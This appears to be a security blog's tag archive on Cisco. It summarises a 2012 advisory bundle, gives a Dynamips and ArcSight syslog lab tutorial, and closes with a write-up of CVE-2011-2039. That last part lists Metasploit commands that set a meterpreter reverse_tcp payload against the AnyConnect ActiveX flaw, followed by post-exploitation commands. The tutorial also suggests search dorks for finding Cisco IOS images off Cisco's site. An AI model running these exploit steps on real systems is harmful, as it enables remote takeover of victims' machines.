Tag Archives: Cisco

Cisco September 2012 Security Advisory Bundle Review

Cisco has release, the 26 September 2012, during his bi-annual Security Advisory Bundle, 9 security bulletins dealing with 8 vulnerabilities. Eight of the advisories address vulnerabilities in Cisco IOS Software, and one advisory addresses a vulnerability in Cisco Unified Communications Manager.

cisco-sa-20120926-bgp – Cisco IOS Software Malformed Border Gateway Protocol Attribute Vulnerability

cisco-sa-20120926-bgp is concerning Cisco IOS, IOS-XR and Cisco IOS-XE Softwares how contains a vulnerability in the Border Gateway Protocol (BGP) routing protocol feature. Repeated exploitation of the vulnerability could lead to inability to route packets to BGP neighbors during reconvergence times.

The vulnerability is identified as CVE-2012-4617, with a CVSS base score of 7.1, and was internally discovered by Cisco during testing.

cisco-sa-20120926-ios-ips – Cisco IOS Software Intrusion Prevention System Denial of Service Vulnerability

cisco-sa-20120926-ios-ips is concerning Intrusion Prevention System (IPS) feature present in Cisco IOS Software. An unauthenticated, remote attacker could cause a reload of an affected device.

The vulnerability is identified as CVE-2012-3950, with a CVSS base score of 7.8, and was discovered when handling customer support requests.

cisco-sa-20120926-nat – Cisco IOS Software Network Address Translation Vulnerabilities

cisco-sa-20120926-nat is concerning Cisco IOS Software Network Address Translation (NAT) how contains two denial of service (DoS) vulnerabilities.

CVE-2012-4618 and CVE-2012-4619 vulnerabilities have both a CVSS base score of 7.8, and were discovered during troubleshooting of TAC service requests.

cisco-sa-20120926-c10k-tunnels – Cisco IOS Software Tunneled Traffic Queue Wedge Vulnerability

cisco-sa-20120926-c10k-tunnels is concerning Cisco IOS Software on Cisco 10000 Series router how contains a vulnerability when processing IP tunneled packets. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4620, with a CVSS base score of 7.8, and was discovered during troubleshooting of a customer issue.

cisco-sa-20120926-dhcpv6 – Cisco IOS Software DHCP Version 6 Server Denial of Service Vulnerability

cisco-sa-20120926-dhcpv6 is concerning Cisco IOS Software and Cisco IOS XE Software how contain a vulnerability how could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4623, with a CVSS base score of 7.1, and was discovered by Cisco during internal testing.

cisco-sa-20120926-ecc – Cisco Catalyst 4500E Series Switch with Cisco Catalyst Supervisor Engine 7L-E Denial of Service Vulnerability

cisco-sa-20120926-ecc is concerning Catalyst 4500E series switch with Supervisor Engine 7L-E how contain a vulnerability how could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4622, with a CVSS base score of 7.8, and was discovered when handling customer service requests.

cisco-sa-20120926-dhcp – Cisco IOS Software DHCP Denial of Service Vulnerability

cisco-sa-20120926-dhcp is concerning Cisco IOS Software how contain a vulnerability how could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-4621, with a CVSS base score of 7.8, and was discovered during the troubleshooting of customer service requests.

cisco-sa-20120926-cucm – Cisco Unified Communications Manager Session Initiation Protocol Denial of Service Vulnerability

cisco-sa-20120926-cucm is concerning Cisco Unified Communications Manager how contains a vulnerability in its Session Initiation Protocol (SIP) implementation. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-3949, with a CVSS base score of 7.8, and was discovered during troubleshooting of TAC service requests.

cisco-sa-20120926-sip – Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability

cisco-sa-20120926-sip is concerning Cisco IOS Software and Cisco IOS XE Software how contains a vulnerability in there Session Initiation Protocol (SIP) implementation. This vulnerability could lead to denial of service (DoS).

The vulnerability is identified as CVE-2012-3949, with a CVSS base score of 7.8, and was discovered during troubleshooting of TAC service requests.

Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration

Cisco provide some useful Smart Business Architecture (SBA) guides for SIEM solutions integration how will helps you to design and deploy best practices that include Cisco switching, routing, security and wireless technologies.

Actually the SBA guides are covering the following solutions :

  • SBA guide how provides a general overview of SIEM technology, as well as best practices, use cases, and deployment considerations for using a SIEM with Cisco infrastructure (click here to read). Cisco products logging retrieval methods,
  • SBA guide for ArcSight SIEM plateform (ESM, Logger, Express, SmartConnectors and Content Pack) integration (click here to read).
  • SBA guide for Loglogic MX Series SIEM product integration (click here to read).
  • SBA guide for netForensics nFX Cinxi One SIEM product integration (click here to read).
  • SBA guide for RSA enVision SIEM product integration (click here to read).
  • SBA guide for Splunk security management solution (click here to read).

ArcSight Cisco IOS SmartConnector installation with Dynamips and Dynagen

In my previous blob posts I have explain on how to install ArcSight Logger L750MB, how to setup a Windows Snare SmartConnector, some useful ArcSight SmartConnector commands and on how to backup your Logger configurations. This new blog post will explain you on how to setup a Cisco lab with Dynamips and Dynagen and how to setup an ArcSight Cisco IOS SmartConnector. The ArcSight Cisco IOS SmartConnector supports 2600 series and above with IOS 11.3, 12.4, 15.0, and 15.1.

Dynamips and Dynagen lab setup

First of all my lab is running under Ubuntu 10.04.2 LTS. Dynamips is a Cisco router emulator, but he can also emulate switches and Cisco PIX/ASA. Dynagen is a front-end for Dynamips. “Dynagen takes care of specifying the right port adapters, generating and matching up those pesky NIO descriptors, specifying bridges, frame-relay, ATM switches, etc. It also provides a management CLI for listing devices, suspending and reloading instances, determining and managing idle-pc values, performing packet captures, etc.”.

You have to create a “dynamics” folder into your “/opt” directory.

Download the latest Dynagen version and uncompress the archive in the “dynamips” folder. My lab Dynagen version is 0.9.1 and this specific version require at least version 0.2.8-RC1 of Dynamics. Download version 0.2.8-RC1 of Dynamics and use the “chmod 755” command to make the Dynamips binary executable.

Create symbolic links, in “/usr/sbin” for the Dynagen and Dynamips programs.

cd /usr/sbin
ln -s /opt/dynamips/dynagen-0.11.0/dynagen dynagen
ln -s /opt/dynamips/dynamips-0.2.8-RC1-x86.bin dynamips

Create a directory for Cisco IOS images.

Download you Cisco IOS images into the “images” directory. To find Cisco IOS images you can use some Google dorks.

For 7200 search with intitle:index.of c7200*.bin -site:cisco.comTry

For 3660 search with intitle:index.of c3660*.bin -site:cisco.comTry

For PIX search with intitle:index.of cisco pix*.bin -site:cisco.comTry

For my lab I have use the “c7200-adventerprisek9-mz.124-4.T1.bin” IOS image. You will maybe need to uncompress the IOS image archive.

Then create a “lab_router.net” file into “/opt/dynamips/dynagen-0.11.0/sample_labs” directory. Here under my “lab_router.net” configuration.

[localhost]
[[7200]]
ram=256
image = /opt/dynamips/images/c7200-adventerprisek9-mz.124-4.T1.bin
nep = npe-400
[[router R1]]
model = 7200
f0/0 = NIO_tap:tap0
f1/0 = NIO_gen_eth:eth0

Maybe you have to adapt your IOS image file path.

Now you have to create a TUN/TAP interface on your Linux box.

Install “uml-utilities” package.

Load the TUN/TAP driver into the kernel.

Create a TUN/TAP interface by invoking the “tunctl” command. Enable the “tap0” interface and configure an IP address for it.

Remove your existing “eth0” interface configuration with the following command.

Add a default route that points to the router interface connected to the “tap0” interface.

Now start the dynamics process with the following command. Not that the “&” character instruct the process to run in the background.

Use the “dynagen” command to process the “lab_router.net” configuration file and start the virtual network.

The Dynagen “list” command will permit you to list the network equipment and the the TCP port for console access.

Connect you with telnet on “localhost” port “2000” to get access to the router.

On the first router configuration question response “no“.

Perform the following tasks on the router, to configure the “f0/0” router interface how is mapped to the TUN/TAP “tap0” interface.

  • Enter in configuration mode.
  • Enable the “f0/0” interface
  • Provide an IP address for this interface
  • Try to ping the “tap0” interface

Now provide Cisco passwords.

At this point you can connect you, with telnet, from the Linux box to the Cisco router directly on IP 10.100.100.1.

Perform the following tasks on the router, to finish our router configuration to have the possibility to communicate with external world.

  • Enter in configuration mode.
  • Enable the “f1/0” interface
  • Provide an IP address for this interface, here 192.168.178.22.
  • Try to ping the default gateway for 192.168.178.0/24 network, here 192.168.178.1.

Your Cisco router is now able to communicate with outside world.

ArcSight Cisco IOS SmartConnector installation and setup

If you have an existing Syslog UDP daemon, for example the SmartConnector configured in the Snare Windows blog post, you don’t need to follow the installation and setup. ArcSight Cisco IOS SmartConnector is considered as a “sub connector” for Syslog SmartConnector. All Cisco IOS messages how will be received by the Syslog UDP daemon are recognized coming from a Cisco IOS, but the same Syslog UDP daemon can also receive Windows Snare, Snort, Juniper NSM, JunOS, Red Hat Linux Audit messages. Cisco IOS Syslog message will be converted into SmartMessage (CEF) format.

First verify that you don’t have any existing Syslog UDP daemon how is running on the box, you can use “netstat -uan” to verify this.

Upload the “ArcSight-5.0.2.5703.0-Connector-Downloadable-Logger-Linux.bin” binary available from the ArcSight Download Center, and use the “chmod 755” command to make the binary executable.

Execute the binary in order to install the SmartConnector.

Press “Enter” twice times, provide the installation directory, in our case “/opt/ArcSightSmartConnectors” and confirm the installation.

We recommend you to create a links in order to remove the SmartConnector.

Once the SmartConnector installed you need to configure him.

Select the destination type that you want to configure for this SmartConnector, in our case it will be the L750MB Logger.

Provide the hostname or IP address of the Logger, the destination port (for Logger software version the port is 9000/TCP), and the Receiver Name (available in the Configuration -> Event Input / Output menu of the Logger).

Select “Syslog Daemon(syslog)” as SmartConnector to install, don’t change the network IP, port and protocol (514/UDP).

Provide a SmartConnector name, don’t forget that the SmartConnector could also receive Syslog messages from other devices than Cisco IOS.

Select if you want to install the SmartConnector as a service or as a standalone application, in our case we will stay in standalone mode.

Now you have to start the SmartConnector by executing the following commands.

The SmartConnector is waiting for messages and is running (ET=Up, HT=Up).

Configure Cisco IOS for event collection

Log again on the Cisco router with telnet.

Execute the following steps to enable Cisco IOS event collection.

  • Enter in enable mode.
  • Enter in configuration mode.
  • Enable Time-Stamps on Log Message
  • Enable System Message Loggin
  • Set the Syslog Destination, in our case the Syslog UDP daemon SmartConnector.

In your ArcSight SmartConnector console, you will see that the first Cisco vendor and CiscoRouter product message has been received by the SmartConnector.

Also if you check the “/opt/ArcSightSmartConnectors/current/logs/agent.log” log file, you will see these messages.

[2011-07-03 21:20:33,717][INFO ][default.com.arcsight.agent.loadable._EventCounter][processSingleAlert] First event from [CISCO|CiscoRouter||192.168.178.22] received.

[2011-07-03 21:20:38,033][INFO ][default.com.arcsight.common.eb.a][processSingleAlert] Succesfully loaded categorization file [cisco/ciscorouter_xr.csv]

[2011-07-03 21:20:45,419][INFO ][default.com.arcsight.agent.loadable._DeviceEventCounter][processSingleAlert] New device found [|192.168.178.22|CISCO|CiscoRouter]. Starting counters.

In your Logger you will see all Cisco events.

CVE-2011-2039 : Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute

Timeline :

Vulnerability discovered by Elazar Broad and submitted to iDefense Labs
Initial vulnerability notification to Cisco the 2009-02-24
Public release of Cisco Security Advisory 2011-06-01
Metasploit PoC provided by bannedit the 2011-06-06

PoC provided by :

bannedit

Reference(s) :

CVE-2011-2039
OSVDB-72714
CISCO-SA-20110601-AC
iDefense Labs

Affected version(s) :

For Windows all versions prior to 2.3.185
For Linux, Apple Mac OS X all versions in major releases other than 2.5.x and 3.0.x
2.5.x releases prior to 2.5.3041
3.0.x releases prior to 3.0.629
Microsoft Windows Mobile versions are affected, but no updated are planned.

Tested on Windows XP SP3 with :

With Cisco AnyConnect VPN Client 2.0.0343

Description :

This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the ‘url’ property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the ‘url’ property. One of these files it will be stored in a temporary directory and executed.

Commands :

use exploit/windows/browser/cisco_anyconnect_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig